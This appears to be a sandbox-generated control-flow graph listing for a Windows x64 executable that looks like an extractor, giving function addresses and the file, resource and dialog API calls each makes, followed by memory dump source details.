7ff6063ad3c1 memcpy_s 21291 7ff6063ab2c8 15 API calls memcpy_s 21266->21291 21267->21231 21269 7ff6063ad42c 21292 7ff6063ab750 46 API calls 3 library calls 21269->21292 21271 7ff6063ad435 21272 7ff6063ad46c 21271->21272 21273 7ff6063ad43d 21271->21273 21275 7ff6063ad4c4 21272->21275 21276 7ff6063ad4ea 21272->21276 21277 7ff6063ad47b 21272->21277 21278 7ff6063ad472 21272->21278 21293 7ff6063b0e1c 21273->21293 21279 7ff6063b0e1c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 21275->21279 21276->21275 21280 7ff6063ad4f4 21276->21280 21281 7ff6063b0e1c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 21277->21281 21278->21275 21278->21277 21283 7ff6063ad39e 21279->21283 21282 7ff6063b0e1c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 21280->21282 21281->21283 21282->21283 21283->21265 21284->21231 21285->21233 21288->21262 21289->21283 21290->21266 21291->21269 21292->21271 21294 7ff6063b0e21 RtlFreeHeap 21293->21294 21298 7ff6063b0e51 Concurrency::details::SchedulerProxy::DeleteThis 21293->21298 21295 7ff6063b0e3c 21294->21295 21294->21298 21299 7ff6063b0bac 15 API calls _invalid_parameter_noinfo_noreturn 21295->21299 21297 7ff6063b0e41 GetLastError 21297->21298 21298->21283 21299->21297 21302->20782 21306 7ff60639c3d7 21305->21306 21307 7ff60639c28b SizeofResource 21305->21307 21306->20819 21307->21306 21308 7ff60639c2a5 LoadResource 21307->21308 21308->21306 21309 7ff60639c2be LockResource 21308->21309 21309->21306 21310 7ff60639c2d3 GlobalAlloc 21309->21310 21310->21306 21311 7ff60639c2f4 GlobalLock 21310->21311 21312 7ff60639c3ce GlobalFree 21311->21312 21313 7ff60639c306 memcpy_s 21311->21313 21312->21306 21314 7ff60639c314 CreateStreamOnHGlobal 21313->21314 21315 7ff60639c3c5 GlobalUnlock 21314->21315 21316 7ff60639c332 21314->21316 21315->21312 21316->21315 21317 7ff60639c3ae 21316->21317 21318 7ff60639c396 GdipCreateHBITMAPFromBitmap 21316->21318 21317->21315 21318->21317 21320 7ff60639c15c 4 API calls 21319->21320 
21321 7ff60639c13a 21320->21321 21322 7ff60639c149 21321->21322 21330 7ff60639c194 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 21321->21330 21322->20825 21322->20826 21322->20827 21324->20830 21326 7ff60639c16e 21325->21326 21327 7ff60639c173 21325->21327 21331 7ff60639c1cc GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 21326->21331 21329 7ff60639ca30 16 API calls _handle_error 21327->21329 21329->20835 21330->21322 21331->21327 21335 7ff606389cfe _snwprintf 21332->21335 21333 7ff606389d73 21453 7ff60638806c 48 API calls 21333->21453 21335->21333 21336 7ff606389e89 21335->21336 21338 7ff606389dfd 21336->21338 21341 7ff606381c80 33 API calls 21336->21341 21337 7ff606381b70 31 API calls 21337->21338 21401 7ff6063846a0 21338->21401 21339 7ff606389d7d memcpy_s 21339->21337 21340 7ff60638a82e 21339->21340 21342 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21340->21342 21341->21338 21344 7ff60638a834 21342->21344 21347 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21344->21347 21346 7ff606389e22 21348 7ff60638424c 100 API calls 21346->21348 21350 7ff60638a83a 21347->21350 21352 7ff606389e2b 21348->21352 21349 7ff606389f17 21419 7ff6063ad800 21349->21419 21352->21344 21354 7ff606389e66 21352->21354 21358 7ff6063a5c30 _handle_error 8 API calls 21354->21358 21355 7ff606389ead 21355->21349 21356 7ff606389254 33 API calls 21355->21356 21356->21355 21357 7ff6063ad800 31 API calls 21370 7ff606389f57 __vcrt_FlsAlloc 21357->21370 21359 7ff60638a80e 21358->21359 21359->20838 21360 7ff60638a089 21361 7ff606384c40 101 API calls 21360->21361 21373 7ff60638a15c 21360->21373 21364 7ff60638a0a1 21361->21364 21367 7ff606384a70 104 API calls 21364->21367 21364->21373 21371 7ff60638a0c9 21367->21371 21370->21360 21370->21373 21427 7ff606384d50 21370->21427 21436 7ff606384a70 21370->21436 21441 7ff606384c40 21370->21441 21371->21373 21394 7ff60638a0d7 __vcrt_FlsAlloc 21371->21394 21454 7ff60639033c MultiByteToWideChar 21371->21454 21446 7ff60638424c 21373->21446 
21374 7ff60638a5ec 21388 7ff60638a6c2 21374->21388 21460 7ff6063b0498 31 API calls 2 library calls 21374->21460 21376 7ff60638a557 21376->21374 21457 7ff6063b0498 31 API calls 2 library calls 21376->21457 21377 7ff60638a54b 21377->20838 21380 7ff60638a7a2 21383 7ff6063ad800 31 API calls 21380->21383 21381 7ff60638a649 21461 7ff6063aecc4 31 API calls _invalid_parameter_noinfo_noreturn 21381->21461 21382 7ff60638a6ae 21382->21388 21462 7ff6063890cc 33 API calls Concurrency::cancel_current_task 21382->21462 21386 7ff60638a7cb 21383->21386 21384 7ff606389254 33 API calls 21384->21388 21390 7ff6063ad800 31 API calls 21386->21390 21388->21380 21388->21384 21389 7ff60638a56d 21458 7ff6063aecc4 31 API calls _invalid_parameter_noinfo_noreturn 21389->21458 21390->21373 21391 7ff60638a5d8 21391->21374 21459 7ff6063890cc 33 API calls Concurrency::cancel_current_task 21391->21459 21392 7ff606390688 WideCharToMultiByte 21392->21394 21394->21373 21394->21374 21394->21376 21394->21377 21394->21392 21395 7ff60638a829 21394->21395 21455 7ff60638ae88 45 API calls _snwprintf 21394->21455 21456 7ff6063ad62c 31 API calls 2 library calls 21394->21456 21463 7ff6063a5df4 8 API calls 21395->21463 21400 7ff60638a868 21399->21400 21400->20840 21402 7ff6063846dd CreateFileW 21401->21402 21404 7ff60638478e GetLastError 21402->21404 21414 7ff60638484e 21402->21414 21405 7ff6063880b0 49 API calls 21404->21405 21406 7ff6063847bc 21405->21406 21407 7ff6063847c0 CreateFileW GetLastError 21406->21407 21413 7ff60638480c 21406->21413 21407->21413 21408 7ff606384891 SetFileTime 21412 7ff6063848af 21408->21412 21409 7ff6063848e8 21410 7ff6063a5c30 _handle_error 8 API calls 21409->21410 21411 7ff6063848fb 21410->21411 21411->21346 21411->21355 21412->21409 21415 7ff606381c80 33 API calls 21412->21415 21413->21414 21416 7ff606384916 21413->21416 21414->21408 21414->21412 21415->21409 21417 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21416->21417 21418 7ff60638491b 21417->21418 21420 
7ff6063ad82d 21419->21420 21426 7ff6063ad842 21420->21426 21464 7ff6063b0bac 15 API calls _invalid_parameter_noinfo_noreturn 21420->21464 21422 7ff6063ad837 21465 7ff6063aae74 31 API calls _invalid_parameter_noinfo_noreturn 21422->21465 21424 7ff6063a5c30 _handle_error 8 API calls 21425 7ff606389f37 21424->21425 21425->21357 21426->21424 21428 7ff606384d6d 21427->21428 21429 7ff606384d89 21427->21429 21430 7ff606384d9b 21428->21430 21466 7ff606383eac 99 API calls _com_raise_error 21428->21466 21429->21430 21432 7ff606384da1 SetFilePointer 21429->21432 21430->21370 21432->21430 21433 7ff606384dbe GetLastError 21432->21433 21433->21430 21434 7ff606384dc8 21433->21434 21434->21430 21467 7ff606383eac 99 API calls _com_raise_error 21434->21467 21437 7ff606384a96 21436->21437 21439 7ff606384a9d 21436->21439 21437->21370 21439->21437 21440 7ff606384520 GetStdHandle ReadFile GetLastError GetLastError GetFileType 21439->21440 21468 7ff606383d8c 99 API calls _com_raise_error 21439->21468 21440->21439 21469 7ff60638491c 21441->21469 21444 7ff606384c67 21444->21370 21447 7ff606384266 21446->21447 21448 7ff606384277 21446->21448 21447->21448 21449 7ff606384279 21447->21449 21450 7ff606384272 21447->21450 21481 7ff6063842d0 21449->21481 21477 7ff6063844e0 21450->21477 21453->21339 21454->21394 21455->21394 21456->21394 21457->21389 21458->21391 21459->21374 21460->21381 21461->21382 21462->21388 21463->21340 21464->21422 21465->21426 21475 7ff60638492d _snwprintf 21469->21475 21470 7ff606384959 21472 7ff6063a5c30 _handle_error 8 API calls 21470->21472 21471 7ff606384a34 SetFilePointer 21471->21470 21474 7ff606384a5c GetLastError 21471->21474 21473 7ff6063849c1 21472->21473 21473->21444 21476 7ff606383eac 99 API calls _com_raise_error 21473->21476 21474->21470 21475->21470 21475->21471 21478 7ff606384503 21477->21478 21479 7ff6063844ef 21477->21479 21478->21448 21479->21478 21480 7ff6063842d0 100 API calls 21479->21480 21480->21478 21482 7ff606384302 21481->21482 21483 
7ff6063842ea 21481->21483 21484 7ff606384326 21482->21484 21487 7ff606383a64 99 API calls 21482->21487 21483->21482 21485 7ff6063842f6 CloseHandle 21483->21485 21484->21448 21485->21482 21487->21484 21488->20850 21491 7ff6063a4d50 21493 7ff6063a4c83 21491->21493 21492 7ff6063a5390 _com_raise_error 14 API calls 21492->21493 21493->21492 21498 7ff606399c49 8 API calls _handle_error 21516 7ff60638e760 21519 7ff60638e7c0 SystemTimeToFileTime 21516->21519 21520 7ff60638e832 21519->21520 21527 7ff60638e8b7 21519->21527 21521 7ff606386768 9 API calls 21520->21521 21523 7ff60638e837 21521->21523 21522 7ff6063a5c30 _handle_error 8 API calls 21524 7ff60638e7bb 21522->21524 21525 7ff60638e84e FileTimeToSystemTime TzSpecificLocalTimeToSystemTime SystemTimeToFileTime SystemTimeToFileTime 21523->21525 21526 7ff60638e842 LocalFileTimeToFileTime 21523->21526 21525->21527 21526->21527 21527->21522 21557 7ff606393e60 21558 7ff606393ec2 21557->21558 21561 7ff606393f05 21557->21561 21606 7ff606394ee4 21558->21606 21562 7ff606393fb4 21561->21562 21604 7ff606384c40 101 API calls 21561->21604 21564 7ff606393fe0 21562->21564 21595 7ff606394049 21562->21595 21566 7ff606394023 21564->21566 21570 7ff606393fea 21564->21570 21623 7ff606395b60 21566->21623 21567 7ff606393f8c 21622 7ff606384e00 SetEndOfFile 21567->21622 21568 7ff606394ee4 59 API calls 21572 7ff606393ee2 21568->21572 21655 7ff606384160 82 API calls 21570->21655 21572->21561 21575 7ff606393ee6 21572->21575 21574 7ff606393f98 21605 7ff606384c40 101 API calls 21574->21605 21654 7ff606383a9c 99 API calls 21575->21654 21578 7ff60639412c 21579 7ff606394031 21578->21579 21582 7ff606394d74 104 API calls 21578->21582 21583 7ff606394168 21579->21583 21686 7ff606383c7c 82 API calls 21579->21686 21580 7ff6063a5c30 _handle_error 8 API calls 21584 7ff6063942f0 21580->21584 21581 7ff606394000 21585 7ff606394940 106 API calls 21581->21585 21598 7ff606393efc 21581->21598 21582->21579 21603 7ff6063941fd 21583->21603 21687 7ff606398db4 8 API calls 
21583->21687 21588 7ff606394013 21585->21588 21656 7ff606385790 21588->21656 21591 7ff606394244 21592 7ff6063942c1 21591->21592 21593 7ff6063942cf 21591->21593 21689 7ff606384e00 SetEndOfFile 21591->21689 21592->21593 21634 7ff606394940 21592->21634 21593->21598 21599 7ff606385790 51 API calls 21593->21599 21595->21578 21670 7ff60639511c 21595->21670 21679 7ff6063900f0 21595->21679 21682 7ff606394d74 21595->21682 21598->21580 21599->21598 21601 7ff60639418e 21602 7ff60639511c 120 API calls 21601->21602 21601->21603 21602->21601 21603->21591 21688 7ff6063838e0 82 API calls 2 library calls 21603->21688 21604->21567 21605->21562 21690 7ff606386288 21606->21690 21608 7ff606394f5b 21610 7ff6063a5ae0 4 API calls 21608->21610 21609 7ff606394f42 21609->21608 21611 7ff606394f53 21609->21611 21613 7ff606394f65 21610->21613 21713 7ff606385db0 51 API calls 2 library calls 21611->21713 21697 7ff606384334 21613->21697 21615 7ff606394ffb 21617 7ff6063a5c30 _handle_error 8 API calls 21615->21617 21619 7ff606393ec7 21617->21619 21618 7ff606395023 21620 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21618->21620 21619->21561 21642 7ff60638552c 21619->21642 21621 7ff606395028 21620->21621 21622->21574 21624 7ff606395b99 21623->21624 21625 7ff60639511c 120 API calls 21624->21625 21629 7ff606395e0e 21624->21629 21630 7ff6063900f0 SendDlgItemMessageW 21624->21630 21631 7ff606395d91 21624->21631 21633 7ff606384d50 101 API calls 21624->21633 21748 7ff606396294 21624->21748 21770 7ff606396b60 21624->21770 21779 7ff60639699c 125 API calls _handle_error 21624->21779 21625->21624 21629->21579 21630->21624 21631->21629 21632 7ff606394d74 104 API calls 21631->21632 21632->21629 21633->21624 21635 7ff60639495a 21634->21635 21640 7ff6063949b2 21634->21640 21789 7ff606384c70 21635->21789 21637 7ff606394a2d 21637->21593 21638 7ff60639499e 21641 7ff6063842d0 100 API calls 21638->21641 21640->21637 21794 7ff606385ff4 21640->21794 21641->21640 21643 7ff606385671 21642->21643 21650 
7ff606385562 21642->21650 21644 7ff6063a5c30 _handle_error 8 API calls 21643->21644 21645 7ff606385687 21644->21645 21645->21568 21646 7ff60638564b 21646->21643 21647 7ff606385c60 56 API calls 21646->21647 21647->21643 21648 7ff6063812bc 33 API calls 21648->21650 21650->21646 21650->21648 21651 7ff60638569c 21650->21651 21808 7ff606385c60 21650->21808 21652 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21651->21652 21653 7ff6063856a1 21652->21653 21654->21598 21655->21581 21657 7ff6063857bb DeleteFileW 21656->21657 21658 7ff6063857b8 21656->21658 21659 7ff6063857d1 21657->21659 21666 7ff606385850 21657->21666 21658->21657 21661 7ff6063880b0 49 API calls 21659->21661 21660 7ff6063a5c30 _handle_error 8 API calls 21662 7ff606385865 21660->21662 21663 7ff6063857f6 21661->21663 21662->21598 21664 7ff6063857fa DeleteFileW 21663->21664 21665 7ff606385817 21663->21665 21664->21665 21665->21666 21667 7ff606385875 21665->21667 21666->21660 21668 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21667->21668 21669 7ff60638587a 21668->21669 21671 7ff606395137 21670->21671 21677 7ff60639512f 21670->21677 21674 7ff60639518a 21671->21674 21671->21677 21828 7ff6063953bc 21671->21828 21674->21677 21856 7ff606398d6c 8 API calls 21674->21856 21675 7ff6063951e1 21857 7ff606383df0 99 API calls 2 library calls 21675->21857 21677->21595 21679->21595 21680 7ff6063a3a80 21679->21680 21681 7ff6063a3a8f SendDlgItemMessageW 21680->21681 21684 7ff606394dad 21682->21684 21683 7ff606394dd3 21683->21595 21684->21683 21984 7ff606384e18 21684->21984 21686->21583 21687->21601 21688->21591 21689->21592 21714 7ff60638885c 21690->21714 21695 7ff6063862ba FindClose 21696 7ff6063862cf 21695->21696 21696->21609 21700 7ff60638436a 21697->21700 21698 7ff60638439e 21701 7ff60638447f 21698->21701 21702 7ff6063880b0 49 API calls 21698->21702 21699 7ff6063843b1 CreateFileW 21699->21698 21700->21698 21700->21699 21703 7ff6063844af 21701->21703 21706 7ff606381c80 33 API calls 
21701->21706 21705 7ff606384409 21702->21705 21704 7ff6063a5c30 _handle_error 8 API calls 21703->21704 21707 7ff6063844c4 21704->21707 21708 7ff60638440d CreateFileW 21705->21708 21709 7ff606384446 21705->21709 21706->21703 21707->21615 21707->21618 21708->21709 21709->21701 21710 7ff6063844d8 21709->21710 21711 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21710->21711 21712 7ff6063844dd 21711->21712 21713->21608 21715 7ff60638887a 21714->21715 21744 7ff60638367c 21715->21744 21718 7ff60638647c 21719 7ff6063864b9 FindFirstFileW 21718->21719 21720 7ff606386592 FindNextFileW 21718->21720 21722 7ff6063865b3 21719->21722 21724 7ff6063864de 21719->21724 21720->21722 21723 7ff6063865a1 GetLastError 21720->21723 21725 7ff6063865d1 21722->21725 21728 7ff606381c80 33 API calls 21722->21728 21742 7ff606386580 21723->21742 21726 7ff6063880b0 49 API calls 21724->21726 21733 7ff6063812bc 33 API calls 21725->21733 21727 7ff606386504 21726->21727 21730 7ff606386508 FindFirstFileW 21727->21730 21731 7ff606386527 21727->21731 21728->21725 21729 7ff6063a5c30 _handle_error 8 API calls 21732 7ff6063862b4 21729->21732 21730->21731 21731->21722 21735 7ff60638656f GetLastError 21731->21735 21737 7ff6063866d4 21731->21737 21732->21695 21732->21696 21734 7ff6063865fb 21733->21734 21736 7ff606388dc4 47 API calls 21734->21736 21735->21742 21738 7ff606386609 21736->21738 21739 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21737->21739 21741 7ff6063866cf 21738->21741 21738->21742 21740 7ff6063866da 21739->21740 21743 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21741->21743 21742->21729 21743->21737 21746 7ff6063836c6 memcpy_s 21744->21746 21745 7ff6063a5c30 _handle_error 8 API calls 21747 7ff60638378a 21745->21747 21746->21745 21747->21696 21747->21718 21750 7ff6063962eb memcpy_s 21748->21750 21749 7ff60639511c 120 API calls 21749->21750 21750->21749 21752 7ff60639633d 21750->21752 21751 7ff60639511c 120 API calls 21751->21752 21752->21751 21755 
7ff60639639f 21752->21755 21769 7ff60639650a 21752->21769 21753 7ff6063a5c30 _handle_error 8 API calls 21754 7ff60639697b 21753->21754 21754->21624 21756 7ff60639511c 120 API calls 21755->21756 21759 7ff6063963f8 21755->21759 21755->21769 21756->21755 21757 7ff6063964a2 21780 7ff60639569c 21757->21780 21759->21757 21760 7ff60639511c 120 API calls 21759->21760 21759->21769 21760->21759 21761 7ff606396500 21762 7ff60639511c 120 API calls 21761->21762 21763 7ff60639674c 21761->21763 21761->21769 21762->21761 21764 7ff60639569c 8 API calls 21763->21764 21765 7ff6063967c0 21764->21765 21766 7ff60639569c 8 API calls 21765->21766 21765->21769 21767 7ff606396896 21766->21767 21767->21769 21784 7ff606395e44 21767->21784 21769->21753 21773 7ff606396ba8 21770->21773 21771 7ff60639511c 120 API calls 21771->21773 21772 7ff606396bdf 21774 7ff60639511c 120 API calls 21772->21774 21775 7ff606396bee 21772->21775 21778 7ff606396c2d 21772->21778 21773->21771 21773->21772 21774->21772 21775->21624 21776 7ff60639511c 120 API calls 21776->21778 21777 7ff606394d74 104 API calls 21777->21778 21778->21775 21778->21776 21778->21777 21779->21624 21781 7ff6063956fe memcpy_s 21780->21781 21782 7ff6063a5c30 _handle_error 8 API calls 21781->21782 21783 7ff606395ae9 21782->21783 21783->21761 21787 7ff606395ea7 21784->21787 21785 7ff606396260 21785->21769 21786 7ff606394d74 104 API calls 21786->21787 21787->21785 21787->21786 21788 7ff60639511c 120 API calls 21787->21788 21788->21787 21790 7ff606384c94 21789->21790 21792 7ff606384ca4 21789->21792 21791 7ff606384c9a FlushFileBuffers 21790->21791 21790->21792 21791->21792 21793 7ff606384d0e SetFileTime 21792->21793 21793->21638 21795 7ff60638601b 21794->21795 21796 7ff60638601e SetFileAttributesW 21794->21796 21795->21796 21797 7ff606386034 21796->21797 21804 7ff6063860b5 21796->21804 21798 7ff6063880b0 49 API calls 21797->21798 21800 7ff606386059 21798->21800 21799 7ff6063a5c30 _handle_error 8 API calls 21801 7ff6063860ca 21799->21801 21802 
7ff60638605d SetFileAttributesW 21800->21802 21803 7ff60638607c 21800->21803 21801->21637 21802->21803 21803->21804 21805 7ff6063860da 21803->21805 21804->21799 21806 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21805->21806 21807 7ff6063860df 21806->21807 21810 7ff606385c8f 21808->21810 21809 7ff606385cbc 21812 7ff606385890 51 API calls 21809->21812 21810->21809 21811 7ff606385ca8 CreateDirectoryW 21810->21811 21811->21809 21813 7ff606385d59 21811->21813 21814 7ff606385cca 21812->21814 21815 7ff606385d69 21813->21815 21817 7ff606385ff4 51 API calls 21813->21817 21816 7ff606385d6d GetLastError 21814->21816 21818 7ff6063880b0 49 API calls 21814->21818 21819 7ff6063a5c30 _handle_error 8 API calls 21815->21819 21816->21815 21817->21815 21820 7ff606385cf8 21818->21820 21821 7ff606385d95 21819->21821 21822 7ff606385cfc CreateDirectoryW 21820->21822 21823 7ff606385d17 21820->21823 21821->21650 21822->21823 21824 7ff606385d50 21823->21824 21825 7ff606385daa 21823->21825 21824->21813 21824->21816 21826 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21825->21826 21827 7ff606385daf 21826->21827 21855 7ff606384a70 104 API calls 21828->21855 21829 7ff6063a5c30 _handle_error 8 API calls 21830 7ff606395176 21829->21830 21830->21674 21830->21675 21830->21677 21831 7ff606395408 21832 7ff606386288 55 API calls 21831->21832 21854 7ff606395621 21831->21854 21833 7ff606395483 21832->21833 21834 7ff606395501 21833->21834 21835 7ff6063954ab 21833->21835 21836 7ff6063954ff 21834->21836 21905 7ff606391dd0 21834->21905 21835->21836 21858 7ff606391bf4 21835->21858 21916 7ff606394e68 21836->21916 21839 7ff6063954bc 21841 7ff6063812bc 33 API calls 21839->21841 21843 7ff6063954f3 21841->21843 21842 7ff60639553b 21844 7ff6063812bc 33 API calls 21842->21844 21853 7ff60639558f 21842->21853 21889 7ff606388d18 21843->21889 21847 7ff60639557b 21844->21847 21846 7ff60639568f 21848 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21846->21848 21923 
7ff606390114 21847->21923 21849 7ff606395694 21848->21849 21851 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21849->21851 21852 7ff60639569a 21851->21852 21853->21846 21853->21849 21853->21854 21854->21829 21855->21831 21857->21677 21939 7ff606387af8 47 API calls 21858->21939 21860 7ff606391c2e 21861 7ff6063812bc 33 API calls 21860->21861 21862 7ff606391c5a 21861->21862 21940 7ff606390aa0 CompareStringW 21862->21940 21864 7ff606391c82 21865 7ff6063812bc 33 API calls 21864->21865 21869 7ff606391cdc 21864->21869 21866 7ff606391cb1 21865->21866 21941 7ff606390ad0 CompareStringW 21866->21941 21867 7ff606381b70 31 API calls 21872 7ff606391d9a 21867->21872 21868 7ff606391dc7 21874 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21868->21874 21869->21868 21870 7ff606391d7b 21869->21870 21875 7ff606391dc2 21869->21875 21870->21867 21873 7ff6063a5c30 _handle_error 8 API calls 21872->21873 21876 7ff606391da9 21873->21876 21878 7ff606391dcd 21874->21878 21877 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21875->21877 21876->21839 21877->21868 21879 7ff606391bf4 64 API calls 21878->21879 21880 7ff606391df9 21879->21880 21881 7ff6063861e8 swprintf 46 API calls 21880->21881 21882 7ff606391e2a 21881->21882 21883 7ff6063812bc 33 API calls 21882->21883 21884 7ff606391e55 21883->21884 21885 7ff606388d18 47 API calls 21884->21885 21886 7ff606391e62 21885->21886 21887 7ff6063a5c30 _handle_error 8 API calls 21886->21887 21888 7ff606391e72 21887->21888 21888->21839 21890 7ff606388d41 21889->21890 21891 7ff606388dbe 21890->21891 21892 7ff606388d4d 21890->21892 21950 7ff60638353c 47 API calls 21891->21950 21942 7ff606386e5c 21892->21942 21897 7ff606381c04 33 API calls 21898 7ff606388d92 21897->21898 21899 7ff606381b70 31 API calls 21898->21899 21900 7ff606388d9d 21899->21900 21901 7ff606381b70 31 API calls 21900->21901 21902 7ff606388da6 21901->21902 21903 7ff6063a5c30 _handle_error 8 API calls 21902->21903 21904 7ff606388db3 21903->21904 
21904->21836 21906 7ff606391bf4 64 API calls 21905->21906 21907 7ff606391df9 21906->21907 21908 7ff6063861e8 swprintf 46 API calls 21907->21908 21909 7ff606391e2a 21908->21909 21910 7ff6063812bc 33 API calls 21909->21910 21911 7ff606391e55 21910->21911 21912 7ff606388d18 47 API calls 21911->21912 21913 7ff606391e62 21912->21913 21914 7ff6063a5c30 _handle_error 8 API calls 21913->21914 21915 7ff606391e72 21914->21915 21915->21836 21917 7ff6063a5ae0 4 API calls 21916->21917 21918 7ff606394e76 21917->21918 21922 7ff6063846a0 54 API calls 21918->21922 21919 7ff606394ebd 21920 7ff606394ed4 21919->21920 21952 7ff606383cd0 100 API calls 2 library calls 21919->21952 21920->21842 21922->21919 21924 7ff6063a3bf8 21923->21924 21925 7ff606388b28 47 API calls 21924->21925 21926 7ff6063a3c2b 21925->21926 21927 7ff60638aee0 48 API calls 21926->21927 21928 7ff6063a3c3f 21927->21928 21929 7ff60638da04 48 API calls 21928->21929 21930 7ff6063a3c4f 21929->21930 21931 7ff606381b70 31 API calls 21930->21931 21932 7ff6063a3c5a 21931->21932 21953 7ff6063a376c 21932->21953 21935 7ff606381b70 31 API calls 21936 7ff6063a3c7b 21935->21936 21937 7ff6063a5c30 _handle_error 8 API calls 21936->21937 21938 7ff6063a3c88 21937->21938 21938->21853 21939->21860 21940->21864 21941->21869 21943 7ff606386e7c 21942->21943 21944 7ff606386ed6 21943->21944 21945 7ff606386e95 21943->21945 21951 7ff606381bd4 33 API calls std::_Xinvalid_argument 21944->21951 21948 7ff606387050 4 API calls 21945->21948 21949 7ff606386ec3 21948->21949 21949->21897 21952->21920 21954 7ff6063a3798 21953->21954 21955 7ff6063812bc 33 API calls 21954->21955 21956 7ff6063a37a8 21955->21956 21965 7ff6063a2bf4 21956->21965 21959 7ff6063a37ef 21960 7ff6063a5c30 _handle_error 8 API calls 21959->21960 21962 7ff6063a3801 21960->21962 21961 7ff6063a3807 21963 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21961->21963 21962->21935 21964 7ff6063a380c 21963->21964 21979 7ff60639e96c PeekMessageW 21965->21979 21968 7ff6063a2c93 
SendMessageW SendMessageW 21970 7ff6063a2cf4 SendMessageW 21968->21970 21971 7ff6063a2cd9 21968->21971 21969 7ff6063a2c45 21972 7ff6063a2c51 ShowWindow SendMessageW SendMessageW 21969->21972 21973 7ff6063a2d13 21970->21973 21974 7ff6063a2d16 SendMessageW SendMessageW 21970->21974 21971->21970 21972->21968 21973->21974 21975 7ff6063a2d43 SendMessageW 21974->21975 21976 7ff6063a2d68 SendMessageW 21974->21976 21975->21976 21977 7ff6063a5c30 _handle_error 8 API calls 21976->21977 21978 7ff6063a2d8c 21977->21978 21978->21959 21978->21961 21980 7ff60639e9d0 GetDlgItem 21979->21980 21981 7ff60639e98c GetMessageW 21979->21981 21980->21968 21980->21969 21982 7ff60639e9ab IsDialogMessageW 21981->21982 21983 7ff60639e9ba TranslateMessage DispatchMessageW 21981->21983 21982->21980 21982->21983 21983->21980 21985 7ff606384e4b 21984->21985 21986 7ff606384e44 21984->21986 21987 7ff606384e55 GetStdHandle 21985->21987 21991 7ff606384e63 21985->21991 21988 7ff6063a5c30 _handle_error 8 API calls 21986->21988 21987->21991 21989 7ff606384fee 21988->21989 21989->21683 21990 7ff606384ebe WriteFile 21990->21991 21991->21986 21991->21990 21992 7ff606384e7e WriteFile 21991->21992 21995 7ff606384f56 21991->21995 22003 7ff606383a18 101 API calls 21991->22003 21992->21991 21993 7ff606384eb4 21992->21993 21993->21991 21993->21992 21996 7ff6063812bc 33 API calls 21995->21996 21997 7ff606384f85 21996->21997 22004 7ff606384190 99 API calls _com_raise_error 21997->22004 22003->21991 22965 7ff6063b0e5c 22966 7ff6063b0ea7 22965->22966 22970 7ff6063b0e6b abort 22965->22970 22972 7ff6063b0bac 15 API calls _invalid_parameter_noinfo_noreturn 22966->22972 22968 7ff6063b0e8e HeapAlloc 22969 7ff6063b0ea5 22968->22969 22968->22970 22970->22966 22970->22968 22971 7ff6063af0c8 abort 2 API calls 22970->22971 22971->22970 22972->22969 20489 7ff6063a5a00 20490 7ff6063a5a16 _com_error::_com_error 20489->20490 20495 7ff6063a7848 20490->20495 20492 7ff6063a5a27 20500 7ff6063a5390 20492->20500 20496 7ff6063a7884 
23071 7ff60638d9b4 CompareStringW 23040->23071 23041->23036 23043 7ff606381c80 33 API calls 23041->23043 23043->23036 23047 7ff606386898 23044->23047 23045 7ff606386962 23072 7ff606386ae8 23045->23072 23047->23045 23051 7ff6063868d6 __vcrt_FlsAlloc 23047->23051 23079 7ff606390ad0 CompareStringW 23047->23079 23048 7ff6063a5c30 _handle_error 8 API calls 23050 7ff606386ac7 23048->23050 23050->23039 23053 7ff6063868fd 23051->23053 23055 7ff606386946 __vcrt_FlsAlloc 23051->23055 23080 7ff606390ad0 CompareStringW 23051->23080 23053->23048 23054 7ff606386a85 23054->23053 23082 7ff60638d9d0 CompareStringW 23054->23082 23055->23045 23055->23053 23057 7ff6063812bc 33 API calls 23055->23057 23058 7ff6063869fd 23055->23058 23063 7ff606386a6a __vcrt_FlsAlloc 23055->23063 23059 7ff6063869ea 23057->23059 23060 7ff606386a4d 23058->23060 23062 7ff606386adf 23058->23062 23061 7ff60638885c 8 API calls 23059->23061 23060->23053 23060->23063 23081 7ff606390ad0 CompareStringW 23060->23081 23061->23058 23065 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 23062->23065 23063->23045 23063->23053 23063->23054 23066 7ff606386ae4 23065->23066 23068 7ff60638dadf 23067->23068 23069 7ff606381c80 33 API calls 23068->23069 23070 7ff60638dafd 23068->23070 23069->23070 23070->23039 23071->23041 23076 7ff606386b14 23072->23076 23073 7ff606386c1d 23074 7ff606386ae8 CompareStringW 23073->23074 23075 7ff606386bc1 23073->23075 23074->23073 23075->23053 23076->23073 23076->23075 23077 7ff606386c02 23076->23077 23077->23075 23083 7ff60638d9d0 CompareStringW 23077->23083 23079->23051 23080->23055 23081->23063 23082->23053 23083->23075

Control-flow Graph (legend: Executed / Not Executed)
Memory Dump Source
• Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
